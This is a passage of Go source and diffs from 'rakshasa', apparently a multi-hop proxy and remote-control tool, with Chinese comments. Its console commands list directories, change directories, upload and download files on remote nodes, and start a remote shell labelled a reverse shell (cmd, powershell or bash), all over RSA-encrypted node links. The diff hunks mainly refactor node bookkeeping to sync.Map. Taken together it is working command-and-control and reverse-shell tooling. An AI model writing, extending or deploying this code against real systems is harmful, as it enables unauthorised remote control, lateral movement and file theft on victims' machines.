c.Println("连接", c.Args[0], "超时")
}
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "dir",
Help: "打印当前目录文件",
Func: func(c *ishell.Context) {
pwd := fileShell.Get("pwd")
n := c.Get("node").(*node)
resChan := make(chan interface{}, 1)
id := n.storeQuery(resChan)
n.Write(common.CMD_DIR, id, []byte(cert.RSAEncrypterByPriv(pwd.(string))))
select {
case res := <-resChan:
n.deleteQuery(id)
c.Println(res)
case <-time.After(common.CMD_TIMEOUT):
n.deleteQuery(id)
c.Println("dir time out")
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "cd",
Help: "切换工作目录",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
dir := c.Args[0]
pwd := fileShell.Get("pwd").(string)
n := c.Get("node").(*node)
if strings.Contains(dir, ":/") || dir[0] == '/' || dir == "~" {
pwd = dir
} else {
pwd += "/" + dir
pwd = strings.TrimRight(getRealPath(pwd), "/")
}
resChan := make(chan interface{}, 1)
id := n.storeQuery(resChan)
n.Write(common.CMD_CD, id, []byte(cert.RSAEncrypterByPriv(pwd)))
select {
case res := <-resChan:
n.deleteQuery(id)
if err, ok := res.(error); ok {
c.Println(err.Error())
} else {
pwd = res.(string)
fileShell.Set("pwd", pwd)
c.SetPrompt(n.uuid + " " + pwd + ">")
}
case <-time.After(common.CMD_TIMEOUT):
n.deleteQuery(id)
c.Println("dir time out")
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "upload",
Help: "上传文件 ,upload 本地文件 远程目录(为空传到工作目录)",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 && len(c.Args) != 2 {
c.Println("参数错误")
return
}
s, err := os.Stat(c.Args[0])
if err != nil {
c.Println("打开本地文件", c.Args[0], "错误 ", err)
return
}
f, err := os.Open(c.Args[0])
if err != nil {
c.Println("打开本地文件", c.Args[0], "错误 ", err)
return
}
defer f.Close()
pwd := fileShell.Get("pwd").(string) + "/"
n := c.Get("node").(*node)
if len(c.Args) == 2 {
pwd = c.Args[1]
}
pwd = strings.ReplaceAll(pwd, "\\", "/")
c.Args[0] = strings.ReplaceAll(c.Args[0], "\\", "/")
i := strings.LastIndex(c.Args[0], "/")
if i == -1 {
i = 0
}
if pwd[len(pwd)-1] == '/' {
pwd += c.Args[0][i:]
}
i = strings.LastIndex(pwd, "/")
if i == -1 {
i = 0
}
filename := pwd[i+1:]
dir := pwd[:i]
dir = strings.TrimRight(getRealPath(dir), "/") + "/"
pwd = dir + filename
resChan := make(chan interface{}, 9999) //避免收消息阻塞
filereadChan := make(chan []byte, 10)
upload := func() {
for i := 0; i < 10; i++ {
buf := make([]byte, common.MAX_PACKAGE-len(pwd)-9)
n, err := f.Read(buf)
if err != nil {
if err == io.EOF {
return
}
resChan <- err
c.Println("读取文件", c.Args[0], "错误", err)
return
}
filereadChan <- buf[:n]
}
}
offset := 0
be := len(pwd) + 1
id := n.storeQuery(resChan)
defer n.deleteQuery(id)
b := []byte(pwd)
b = append(b, 0, 0, 0, 0, 0, 0, 0, 0, 0)
c.ProgressBar().Start()
go upload()
var resnum int
for {
select {
case data := <-filereadChan:
b[be] = byte(offset)
b[be+1] = byte(offset >> 8)
b[be+2] = byte(offset >> 16)
b[be+3] = byte(offset >> 24)
b[be+4] = byte(offset >> 32)
b[be+5] = byte(offset >> 40)
b[be+6] = byte(offset >> 48)
b[be+7] = byte(offset >> 56)
offset += len(data)
n.Write(common.CMD_UPLOAD, id, cert.RSAEncrypterByPrivByte(append(b, data...)))
case res := <-resChan:
switch v := res.(type) {
case error:
c.ProgressBar().Stop()
c.Println("上传失败", res)
return
case int64:
resnum++
i := v * 100 / s.Size()
c.ProgressBar().Suffix(fmt.Sprint(" ", i, "%"))
c.ProgressBar().Progress(int(i))
if v == s.Size() {
c.ProgressBar().Stop()
c.Println(c.Args[0], "上传成功")
return
}
if resnum >= 5 {
go upload()
resnum -= 10
}
default:
c.Println("协议错误")
return
}
case <-time.After(common.CMD_TIMEOUT):
c.ProgressBar().Stop()
c.Println("upload time out")
return
}
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "download",
Help: "下载文件 download 远程文件 本地目录(为空本地执行目录)",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 && len(c.Args) != 2 {
c.Println("参数错误")
return
}
pwd := fileShell.Get("pwd").(string)
n := c.Get("node").(*node)
file := c.Args[0]
file = strings.ReplaceAll(file, "\\", "/")
if strings.Contains(file, ":/") || file[0] == '/' {
pwd = file
} else {
pwd += "/" + file
}
i := strings.LastIndex(pwd, "/")
if i == -1 {
i = 0
}
filename := pwd[i+1:]
dir := pwd[:i]
dir = strings.TrimRight(getRealPath(dir), "/") + "/"
mydir, err := os.Getwd()
local := "./" + filename
if err == nil {
local = mydir + "/" + filename
}
if len(c.Args) == 2 {
s, err := os.Stat(c.Args[1])
if err == nil {
if s.IsDir() {
local = strings.TrimRight(c.Args[1], "/") + "/" + filename
} else {
local = c.Args[1]
}
} else {
local = c.Args[1]
}
}
pwd = dir + filename
result := make(chan interface{}, 999)
id := n.storeQuery(result)
defer n.deleteQuery(id)
b := []byte(pwd)
b = append(b, []byte{0, 0, 0, 0, 0, 0, 0, 0, 0}...)
total := int64(-1)
be := len(pwd) + 1
b[be] = byte(total)
b[be+1] = byte(total >> 8)
b[be+2] = byte(total >> 16)
b[be+3] = byte(total >> 24)
b[be+4] = byte(total >> 32)
b[be+5] = byte(total >> 40)
b[be+6] = byte(total >> 48)
b[be+7] = byte(total >> 56)
n.Write(common.CMD_DOWNLOAD, id, cert.RSAEncrypterByPrivByte(b))
c.ProgressBar().Start()
size := int64(0)
resnum := 0
total = 0
var f *os.File
for {
select {
case res := <-result:
switch v := res.(type) {
case error:
c.ProgressBar().Stop()
c.Println("下载失败", res)
return
case int64:
var err error
size = v
f, err = os.OpenFile(local, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0666)
if err != nil {
c.Println("本地文件 ", local, "写入失败", err.Error())
return
}
defer f.Close()
case []byte:
if f == nil {
c.Println("本地文件 ", local, "不可写入")
return
}
resnum++
num, err := f.Write(v)
if err != nil {
c.Println("本地文件 ", local, "写入失败", err.Error())
return
}
if num != len(v) {
c.Println("本地文件 ", local, "写入失败,写入量不符")
return
}
total += int64(num)
i := total * 100 / size
c.ProgressBar().Suffix(fmt.Sprint(" ", i, "%"))
c.ProgressBar().Progress(int(i))
if total == size {
c.ProgressBar().Stop()
c.Println(c.Args[0], "下载成功 文件保存到", local)
return
}
if resnum == 10 {
resnum -= 10
b[be] = byte(total)
b[be+1] = byte(total >> 8)
b[be+2] = byte(total >> 16)
b[be+3] = byte(total >> 24)
b[be+4] = byte(total >> 32)
b[be+5] = byte(total >> 40)
b[be+6] = byte(total >> 48)
b[be+7] = byte(total >> 56)
n.Write(common.CMD_DOWNLOAD, id, cert.RSAEncrypterByPrivByte(b))
}
default:
c.Println("协议错误")
return
}
case <-time.After(common.CMD_TIMEOUT):
c.ProgressBar().Stop()
c.Println("upload time out")
return
}
}
},
})
remoteShell.AddCmd(&ishell.Cmd{
Name: "new",
Help: "与一个或者多个节点连接,使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,使用方法 connect ip:端口")
return
}
for _, addr := range strings.Split(c.Args[0], ",") {
_, err := getNode(addr)
if err != nil {
c.Println("连接", addr, "失败", err)
return
}
}
},
})
remoteShell.AddCmd(&ishell.Cmd{
Name: "shell",
Help: "反弹shell 使用方法 shell id/uuid 启动参数 ,启动参数可为空,win默认启动cmd,linux默认启动bash 如 shell 1 powershell 。 shell 1 zsh",
Func: func(c *ishell.Context) {
if len(c.Args) < 1 {
c.Println("参数错误,例子 shell 1 powershell")
return
}
param := ""
if len(c.Args) == 2 {
param = c.Args[1]
}
n, _ := getNode(c.Args[0])
if n == nil {
c.Println("无法连接节点", c.Args[0])
return
}
res := make(chan interface{}, 999)
id := n.storeQuery(res)
defer n.deleteQuery(id)
p := StartCmdParam{
Param: param,
Size: common.GetSize(),
}
b, _ := json.Marshal(p)
n.Write(common.CMD_SHELL, id, cert.RSAEncrypterByPrivByte(b))
s := &remoteCmd{
cmd: nil,
stdin: nil,
inChan: make(chan []byte, 999),
translate: func(in []byte) ([]byte, error) { return in, nil },
pong: time.Now().Unix(),
}
select {
case i := <-res:
switch v := i.(type) {
case error:
c.Println("启动shell失败,错误", v.Error())
case []byte:
data := v
s.id = uint32(data[0]) | uint32(data[1])<<8 | uint32(data[2])<<16 | uint32(data[3])<<24
switch data[4] {
case 0: //windows
if string(data[len(data)-6:]) == string([]byte{32, 57, 51, 54, 13, 10}) { //活动代码页: 936
//gbk转utf8
s.translate = func(in []byte) ([]byte, error) {
reader := transform.NewReader(bytes.NewReader(in), simplifiedchinese.GBK.NewDecoder())
d, e := ioutil.ReadAll(reader)
if e != nil {
return nil, e
}
return d, nil
}
}
case 1: //linux
if runtime.GOOS == "windows" {
if !common.EnableTermVt {
s.translate = func(in []byte) ([]byte, error) {
if in[0] == 27 {
r, _ := regexp.Compile(`\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])`)
res := r.ReplaceAllString(string(in), "")
return []byte(res), nil
}
return in, nil
}
}
}
}
atomic.CompareAndSwapInt32(&s.cmdStatus, 0, 1)
}
case <-time.After(common.CMD_TIMEOUT):
c.Println("启动shell失败,超时")
return
}
n.shellMap.Store(s.id, s)
r, _ := readline.NewEx(&readline.Config{FuncIsTerminal: func() bool { return false }, ForcePrint: true})
defer func() {
n.shellMap.Delete(s.id)
atomic.StoreInt32(&s.cmdStatus, -1)
c.Println("请按回车键退出")
r.Close()
}()
go func() {
for {
switch s.cmdStatus {
case 1:
input, err := r.ReadlineEx()
if err != nil {
if err != readline.ErrInterrupt {
res <- err
return
}
if s.cmdStatus == 1 {
n.Write(common.CMD_SHELL_DATA, s.id, []byte{03})
}
}
if s.cmdStatus == 1 {
n.Write(common.CMD_SHELL_DATA, s.id, []byte(input+"\n"))
}
case 0:
time.Sleep(time.Millisecond * 100)
case -1:
return
}
}
}()
tick := time.NewTicker(common.CMD_TIMEOUT / 2)
for {
select {
case b := <-s.inChan:
s.pong = time.Now().Unix()
if len(b) > 0 {
b, err := s.translate(b)
if err != nil {
c.Println("shell 运行失败", err)
return
}
fmt.Print(string(b))
}
case v := <-res:
if err, ok := v.(error); ok {
if err.Error() != "退出shell" {
c.Println("运行shell", param, "失败", err)
}
} else {
c.Println("无法处理消息", v)
}
return
case <-tick.C:
s.ping = time.Now().Unix()
if s.ping-s.pong > int64(common.CMD_TIMEOUT/time.Second) {
c.Println("shell time out")
return
}
n.Write(common.CMD_SHELL_DATA, s.id, nil)
}
}
},
})
rootCli.AddCmd(&ishell.Cmd{
Name: "remoteshell",
Help: "远程shell",
Func: func(c *ishell.Context) {
remoteShell.Run()
},
})
}
// 打印节点
func printNodes(c *ishell.Context) {
l := clientLock.RLock()
defer l.RUnlock()
var list []*node
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
list = append(list, n)
return true
})
orderNode(list)
c.Println("ID UUID HostName GOOS IP listenIP")
c.Println("-----------------------------------------------------------------------------------------------------------------------------")
for k, n := range list {
n.id = k + 1
hostname := bytes.Repeat([]byte(" "), 22)
copy(hostname, n.hostName)
ip := bytes.Repeat([]byte(" "), 23)
if n.uuid == currentNode.uuid {
copy(ip, "(localhost)"+":"+strconv.Itoa(n.port))
} else {
copy(ip, n.addr+":"+strconv.Itoa(n.port))
}
listenip := n.mainIp
goos := bytes.Repeat([]byte(" "), 11)
copy(goos, n.goos)
c.Printf("%2d %s %s %s %s %s\n", n.id, n.uuid, hostname, goos, ip, listenip)
}
}
func getRealPath(path string) string {
path_s := strings.Split(path, "/")
realpath := []string{}
if len(path_s) == 0 {
return "error"
}
for _, value := range path_s {
if value == ".." {
k := len(realpath)
kk := k - 1
realpath = append(realpath[:kk], realpath[k:]...)
} else {
realpath = append(realpath, value)
}
}
return strings.Join(realpath, "/")
}
func printConn() {
connMap.Range(func(key, value interface{}) bool {
fmt.Println(key)
return true
})
}
+90 -110
View File
@@ -12,6 +12,7 @@ import (
"net/url"
"rakshasa/aes"
"rakshasa/common"
"runtime/debug"
"strconv"
"strings"
"sync"
@@ -34,13 +35,13 @@ type Conn struct {
node *node
nodeaddr string
//key string
remoteAddr string
inChan chan func()
OutChan chan []byte
close chan string
isClient bool
nodeConn *tls.Conn
regResult chan RegMsg
remoteAddr string
inChan chan func()
OutChan chan []byte
close chan string
isClient bool
nodeConn *tls.Conn
regResult chan RegMsg
}
type serverListen struct {
@@ -495,7 +496,6 @@ func (c *Conn) handlerNodeRead() {
if common.Debug {
fmt.Println("fromto", msg.From, msg.To, common.CmdToName[msg.CmdOpteion], int(lengbuf[0])+int(lengbuf[1])<<8)
}
if msg.To == common.NoneUUID.String() && c.node == nil {
c.inChan <- func() {
newNode := &node{
@@ -504,83 +504,77 @@ func (c *Conn) handlerNodeRead() {
newNode.do(msg)
}
} else if msg.To == currentNode.uuid {
func() {
l := clientLock.RLock()
v, ok := nodeMap[msg.From]
l.RUnlock()
if ok && v.port != 0 {
c.inChan <- func() {
v.do(msg)
v, ok := nodeMap.Load(msg.From)
if ok && v.(*node).port != 0 {
c.inChan <- func() {
v.(*node).do(msg)
}
} else {
if !ok {
newNode := &node{
uuid: msg.From,
conn: c,
waitMsg: []*common.Msg{msg},
}
} else {
l := clientLock.Lock()
v, ok := nodeMap[msg.From]
if !ok {
newNode := &node{
uuid: msg.From,
conn: c,
waitMsg: []*common.Msg{msg},
}
result := make(chan interface{}, 1)
id := newNode.storeQuery(result)
if common.Debug {
fmt.Printf("nodeMap1 %s %p \r\n", msg.From, newNode)
}
nodeMap[msg.From] = newNode
l.Unlock()
newNode.Write(common.CMD_GET_CURRENT_NODE, id, []byte{1}) //获取丢失节点的信息
go func() {
defer newNode.deleteQuery(id)
select {
case res := <-result:
if res == nil {
for _, m := range newNode.waitMsg {
c.inChan <- func() {
newNode.do(m)
}
result := make(chan interface{}, 1)
id := newNode.storeQuery(result)
nodeMap.Store(msg.From, newNode)
newNode.Write(common.CMD_GET_CURRENT_NODE, id, []byte{1}) //获取丢失节点的信息
go func() {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
debug.PrintStack()
}
newNode.deleteQuery(id)
}()
select {
case res := <-result:
if res == nil {
for _, m := range newNode.waitMsg {
c.inChan <- func() {
newNode.do(m)
}
}
case <-time.After(common.CMD_TIMEOUT):
newNode.Close("超时")
}
}()
case <-time.After(common.CMD_TIMEOUT):
newNode.Close("超时")
}
}()
} else {
if msg.CmdOpteion == common.CMD_GET_CURRENT_NODE_RESULT {
n := v.(*node)
var res chan interface{}
if _v, ok := v.loadQuery(msg.CmdId); !ok {
if _v, ok := n.loadQuery(msg.CmdId); !ok {
return
} else {
res = _v
}
var nmsg nodeInfo
err = json.Unmarshal(msg.CmdData, &nmsg)
if err != nil {
res <- err
return
}
v.hostName = cert.RSADecrypterStr(nmsg.HostName)
v.uuid = cert.RSADecrypterStr(nmsg.UUID)
if v.port, err = strconv.Atoi(cert.RSADecrypterStr(nmsg.Port)); err != nil {
v.port = -1
}
v.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
v.goos = cert.RSADecrypterStr(nmsg.Goos)
res <- nil
} else {
v.waitMsg = append(v.waitMsg, msg)
var nmsg nodeInfo
err = json.Unmarshal(msg.CmdData, &nmsg)
if err != nil {
res <- err
return
}
n.hostName = cert.RSADecrypterStr(nmsg.HostName)
n.uuid = cert.RSADecrypterStr(nmsg.UUID)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(nmsg.Port)); err != nil {
n.port = -1
}
n.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
n.goos = cert.RSADecrypterStr(nmsg.Goos)
res <- nil
} else {
v.(*node).waitMsg = append(v.(*node).waitMsg, msg)
}
l.Unlock()
}
}
}()
} else {
@@ -622,7 +616,6 @@ func (c *Conn) handlerNodeRead() {
func (c *Conn) handle() {
c.OutChan = make(chan []byte, 64)
c.inChan = make(chan func())
c.close = make(chan string, 999)
go func() {
@@ -648,43 +641,34 @@ func (c *Conn) handle() {
c.node.ping(0)
c.node.nextPingTime = time.Now().Unix() + 5
}
func() { //返回false则退出handle
connMap.Delete(c.remoteAddr)
l := clientLock.Lock()
defer func() {
l.Unlock()
}()
if atomic.CompareAndSwapInt32(&c.closeTag, 0, 1) {
if common.Debug {
fmt.Println(c.nodeConn.RemoteAddr().String(), "关闭原因", reason)
}
if c.nodeConn != nil {
if common.Debug {
fmt.Println("執行close1")
}
c.nodeConn.Close()
}
if c.node != nil {
c.node.Close(reason)
//移除上游连接
for i := len(upLevelNode) - 1; i >= 0; i-- {
n := upLevelNode[i]
if n.uuid == c.node.uuid {
upLevelNode = append(upLevelNode[:i], upLevelNode[i+1:]...)
}
}
if common.Debug {
fmt.Println("upLevelNode",len(upLevelNode))
}
}
connMap.Delete(c.remoteAddr)
if atomic.CompareAndSwapInt32(&c.closeTag, 0, 1) {
if common.Debug {
fmt.Println(c.nodeConn.RemoteAddr().String(), "关闭原因", reason)
}
return
}()
if c.nodeConn != nil {
if common.Debug {
fmt.Println("執行close1")
}
c.nodeConn.Close()
}
if c.node != nil {
c.node.Close(reason)
//移除上游连接
for i := len(upLevelNode) - 1; i >= 0; i-- {
n := upLevelNode[i]
if n.uuid == c.node.uuid {
upLevelNode = append(upLevelNode[:i], upLevelNode[i+1:]...)
}
}
if common.Debug {
fmt.Println("upLevelNode", len(upLevelNode))
}
}
}
return
}
}
@@ -715,12 +699,8 @@ func (c *Conn) reg() error {
return nil
}
func (c *Conn) WriteToUUID(msg *common.Msg) {
l := clientLock.RLock()
defer l.RUnlock()
if n, ok := nodeMap[msg.To]; ok {
n.WriteMsg(msg)
if n, ok := nodeMap.Load(msg.To); ok {
n.(*node).WriteMsg(msg)
}
}
@@ -733,10 +713,10 @@ func (c *Conn) tlsWrite(b []byte) error {
c.nodeConn.SetWriteDeadline(time.Now().Add(common.WRITE_DEADLINE))
n, err := c.nodeConn.Write(b)
if common.Debug {
if c.node!=nil{
if c.node != nil {
fmt.Println("writeto", c.node.uuid, n)
}else{
fmt.Println("writeto",common.NoneUUID, n)
} else {
fmt.Println("writeto", common.NoneUUID, n)
}
}
+151 -129
View File
@@ -12,20 +12,42 @@ import (
"math/rand"
"net"
"os"
"os/exec"
"rakshasa/common"
"runtime"
"runtime/debug"
"strconv"
"strings"
"sync"
"sync/atomic"
"time"
"unsafe"
"github.com/creack/pty"
)
var (
shellMapLock sync.Mutex
)
type StartCmdParam struct {
Param string
Size *pty.Winsize
}
type remoteCmd struct {
cmdStatus int32
cmd *exec.Cmd
id uint32
stdin io.WriteCloser
inChan chan []byte
translate func(in []byte) ([]byte, error)
ping, pong int64
}
var (
currentNode = &node{}
clientLock = &lock{}
nodeMap = make(map[string]*node)
nodeMap = sync.Map{}
upLevelNode []*node //上游节点
upNodeWrite = make(chan []byte, 999)
extNodeIp []string
@@ -64,7 +86,7 @@ func InitCurrentNode() {
addr: currentNode.addr,
}
currentNode.mirrorNode.mirrorNode = currentNode
nodeMap[currentNode.uuid] = currentNode
nodeMap.Store(currentNode.uuid, currentNode)
//fmt.Println("当前节点UUID", currentNode.uuid)
go func() {
for b := range upNodeWrite {
@@ -91,6 +113,40 @@ func InitCurrentNode() {
nodeTickPing()
time.AfterFunc(time.Second*10, checkUpLevelNode)
}
func getNode(arg string) (n *node, err error) {
id, err := strconv.Atoi(arg)
if err == nil {
nodeMap.Range(func(key, value interface{}) bool {
_n := value.(*node)
if _n.id == id {
n = _n
return false
}
return true
})
} else {
nodeMap.Range(func(key, value interface{}) bool {
node := value.(*node)
if fmt.Sprintf("%s:%d", node.mainIp, node.port) == arg {
n = node
return false
} else if fmt.Sprintf("%s:%d", node.addr, node.port) == arg {
n = node
return false
} else if node.uuid == arg {
n = node
return false
}
return true
})
}
if n != nil {
return n, nil
} else {
return connectNew(arg)
}
}
func checkUpLevelNode() {
if len(currentConfig.DstNode) > 0 && len(upLevelNode) == 0 {
@@ -114,36 +170,20 @@ func checkUpLevelNode() {
return
}
}
func() {
l := clientLock.RLock()
defer l.RUnlock()
for _, n := range nodeMap {
if n.uuid != currentNode.uuid {
func() {
l.RUnlock()
defer clientLock.RLock(l)
if len(n.mainIp) == 0 {
_, err := getNode(fmt.Sprintf("%s:%d", n.addr, n.port))
if common.Debug {
fmt.Printf("连接n.addr %s 错误 %v \r\n", fmt.Sprintf("%s:%d", n.addr, n.port), err)
}
}
}()
if len(upLevelNode) > 0 {
return
}
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
if len(n.mainIp) == 0 {
getNode(fmt.Sprintf("%s:%d", n.addr, n.port))
}
if len(upLevelNode) > 0 {
return false
}
}
}()
return true
})
}
}
}
time.AfterFunc(time.Second*5, checkUpLevelNode)
}
@@ -153,7 +193,8 @@ func nodeTickPing() {
defer l.RUnlock()
now := time.Now().Unix()
for _, n := range nodeMap {
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
if n.mainIp != "" {
addr1 := fmt.Sprintf("%s:%d", n.mainIp, n.port)
@@ -177,8 +218,8 @@ func nodeTickPing() {
}
}
}
return true
})
time.AfterFunc(time.Second*1, nodeTickPing)
}
@@ -288,19 +329,19 @@ func connectNew(addr string) (n *node, e error) {
}
n.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); n.port==0 {
n.port = -1
}
if v, ok := nodeMap[regmsg.UUID]; ok {
if v.conn.node != nil && v.conn.node.uuid == regmsg.UUID && v.conn.closeTag == 0 {
if v, ok := nodeMap.Load(regmsg.UUID); ok {
if v.(*node).conn.node != nil && v.(*node).conn.node.uuid == regmsg.UUID && v.(*node).conn.closeTag == 0 {
n.uuid = "" //清空uuid避免正常的node被删
n.conn.Close("重复注册") //当前的连接关掉
n.conn = v.conn
v.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if v.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
v.port = -1
v.(*node).mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if v.(*node).port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); v.(*node).port==0 {
v.(*node).port = -1
}
n = v
n = v.(*node)
} else {
n.conn.node = n
}
@@ -308,10 +349,9 @@ func connectNew(addr string) (n *node, e error) {
} else {
n.conn.node = n
}
nodeMap[n.uuid] = n
nodeMap.Store(n.uuid, n)
n.reConnectAddrs = []string{addr}
n.Write(common.CMD_GET_NODE, 0, nil)
return n, nil
case <-time.After(time.Second * 10):
return nil, errors.New("time out")
@@ -454,9 +494,6 @@ func (n *node) do(msg *common.Msg) {
}
case common.CMD_REG:
func() {
l := clientLock.Lock()
defer l.Unlock()
var regmsg RegMsg
err = json.Unmarshal(msg.CmdData, &regmsg)
@@ -468,7 +505,7 @@ func (n *node) do(msg *common.Msg) {
}
uuid := regmsg.UUID
if uuid == currentNode.uuid {
regmsg.Err = "不能连接自己"
regmsg.Err = "请求的UUID相同,无法连接自己,请将节点设置为不同的UUID"
b, _ := json.Marshal(regmsg)
n.Write(common.CMD_REG_RESULT, 0, b)
return
@@ -491,23 +528,20 @@ func (n *node) do(msg *common.Msg) {
resultMsg.Port = cert.RSAEncrypterStr(strconv.Itoa(currentNode.port))
resultMsg.Goos = cert.RSAEncrypterStr(currentNode.goos)
b, _ := json.Marshal(resultMsg)
//返回成功结果
n.Write(common.CMD_REG_RESULT, 0, b)
//储存节点
n.uuid = uuid
if v, ok := nodeMap[uuid]; !ok || v.conn.closeTag > 0 {
n.conn.node = n
if common.Debug {
fmt.Printf("nodeMap2 %s %p \r\n", regmsg.UUID, n)
}
nodeMap[regmsg.UUID] = n
b, _ := json.Marshal(resultMsg)
//返回成功结果
n.Write(common.CMD_REG_RESULT, 0, b)
//储存节点
n.uuid = uuid
if v, ok := nodeMap.Load(uuid); !ok || v.(*node).conn.closeTag > 0 {
n.conn.node = n
if common.Debug {
fmt.Printf("nodeMap2 %s %p \r\n", regmsg.UUID, n)
}
currentNode.broadcastNode()
//把本机所有节点同步到注册机器
go n.writeGetNodeResult(msg.CmdId)
}()
nodeMap.Store(regmsg.UUID, n)
}
currentNode.broadcastNode()
case common.CMD_REG_RESULT:
var regmsg RegMsg
err = json.Unmarshal(msg.CmdData, &regmsg)
@@ -520,7 +554,7 @@ func (n *node) do(msg *common.Msg) {
default:
}
//交换节点
go n.writeGetNodeResult(msg.CmdId)
n.writeGetNodeResult(msg.CmdId)
case common.CMD_REMOTE_REG:
var regmsg RegMsg
@@ -569,9 +603,11 @@ func (n *node) do(msg *common.Msg) {
return
}
l := clientLock.Lock()
defer l.Unlock()
if n.uuid != regmsg.UUID {
var targetNode *node
if targetNode, ok = nodeMap[regmsg.UUID]; !ok {
if _v, ok := nodeMap.Load(regmsg.UUID); !ok {
targetNode = getNewNode(nodeInfo{
UUID: regmsg.UUID,
HostName: cert.RSADecrypterStr(regmsg.Hostname),
@@ -582,8 +618,9 @@ func (n *node) do(msg *common.Msg) {
if common.Debug {
fmt.Printf("nodeMap4 %s %p \r\n", regmsg.UUID, n)
}
nodeMap[regmsg.UUID] = targetNode
nodeMap.Store(regmsg.UUID, targetNode)
} else {
targetNode = _v.(*node)
targetNode.updateNode(nodeInfo{
UUID: regmsg.UUID,
HostName: cert.RSADecrypterStr(regmsg.Hostname),
@@ -596,8 +633,6 @@ func (n *node) do(msg *common.Msg) {
} else {
v <- n
}
l.Unlock()
n.writeGetNodeResult(msg.CmdId)
case common.CMD_PING:
@@ -805,12 +840,12 @@ func (n *node) do(msg *common.Msg) {
Goos: cert.RSADecrypterStr(_n.Goos),
}
if _n.UUID != currentNode.uuid {
if v, ok := nodeMap[_n.UUID]; !ok {
nodeMap[_n.UUID] = getNewNode(_n, n)
if v, ok := nodeMap.Load(_n.UUID); !ok {
nodeMap.Store(_n.UUID, getNewNode(_n, n))
} else {
v.hostName = _n.HostName
v.mainIp = _n.MainIp
v.port, _ = strconv.Atoi(_n.Port)
v.(*node).hostName = _n.HostName
v.(*node).mainIp = _n.MainIp
v.(*node).port, _ = strconv.Atoi(_n.Port)
}
}
@@ -842,34 +877,29 @@ func (n *node) do(msg *common.Msg) {
if err != nil {
return
}
l := clientLock.Lock()
defer l.Unlock()
if v, ok := nodeMap[nmsg.UUID]; !ok {
if v, ok := nodeMap.Load(nmsg.UUID); !ok {
newNode := getNewNode(nmsg, n)
if common.Debug {
fmt.Printf("nodeMap5 %s %p \r\n", nmsg.UUID, newNode)
}
nodeMap[nmsg.UUID] = newNode
nodeMap.Store(nmsg.UUID, newNode)
} else if nmsg.UUID != currentNode.uuid {
n := v.(*node)
port, err := strconv.Atoi(cert.RSADecrypterStr(nmsg.Port))
if err == nil {
v.port = port
n.port = port
} else {
v.port = -1
n.port = -1
}
v.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
v.hostName = cert.RSADecrypterStr(nmsg.HostName)
v.goos = cert.RSADecrypterStr(nmsg.Goos)
v.uuid = nmsg.UUID
n.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
n.hostName = cert.RSADecrypterStr(nmsg.HostName)
n.goos = cert.RSADecrypterStr(nmsg.Goos)
n.uuid = nmsg.UUID
if common.Debug {
fmt.Printf("nodeMap6 %s %p \r\n", nmsg.UUID, v)
}
nodeMap[nmsg.UUID] = v
nodeMap.Store(nmsg.UUID, n)
}
case common.CMD_DIR:
@@ -1240,26 +1270,17 @@ func getNewNode(m nodeInfo, n *node) *node {
func allNodesDo(f func(*node) (bool, error)) (err error) {
var ok bool
l := clientLock.RLock()
defer l.RUnlock()
for _, n := range nodeMap {
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
func() {
l.RUnlock()
defer clientLock.RLock(l)
ok, err = f(n)
}()
if err != nil {
return err
}
if !ok {
break
ok, err = f(n)
if err != nil || !ok {
return false
}
}
}
return nil
return true
})
return err
}
func (n *node) ping(id uint32) {
if common.NoPing {
@@ -1332,12 +1353,7 @@ func (n *node) ping(id uint32) {
func (n *node) Delete(reason string) {
go func() {
if atomic.CompareAndSwapInt32(&n.isClose, 0, 1) {
l := clientLock.Lock()
_, ok := nodeMap[n.uuid]
if ok {
delete(nodeMap, n.uuid)
}
l.Unlock()
n.connMap.Range(func(key, value interface{}) bool {
if v, ok := value.(common.Conn); ok {
v.Close(reason)
@@ -1368,6 +1384,7 @@ func (n *node) Delete(reason string) {
n.shellMap.Delete(key)
return true
})
nodeMap.Delete(n.uuid)
}
}()
@@ -1464,27 +1481,32 @@ func (n *node) storeConn(v common.Conn) (newID uint32) {
}
func (n *node) writeGetNodeResult(id uint32) {
l := clientLock.RLock()
go func() {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
debug.PrintStack()
}
}()
var s []*nodeInfo
nodeMap.Range(func(key, value interface{}) bool {
_n := value.(*node)
if _n.uuid != currentNode.uuid {
s = append(s, &nodeInfo{
UUID: _n.uuid,
HostName: cert.RSAEncrypterStr(_n.hostName),
MainIp: cert.RSAEncrypterStr(_n.mainIp),
Port: cert.RSAEncrypterStr(strconv.Itoa(_n.port)),
Goos: cert.RSAEncrypterStr(_n.goos),
})
}
return true
})
defer l.RUnlock()
b, _ := json.Marshal(s)
n.Write(common.CMD_GET_NODE_RESULT, id, b)
}()
var s []*nodeInfo
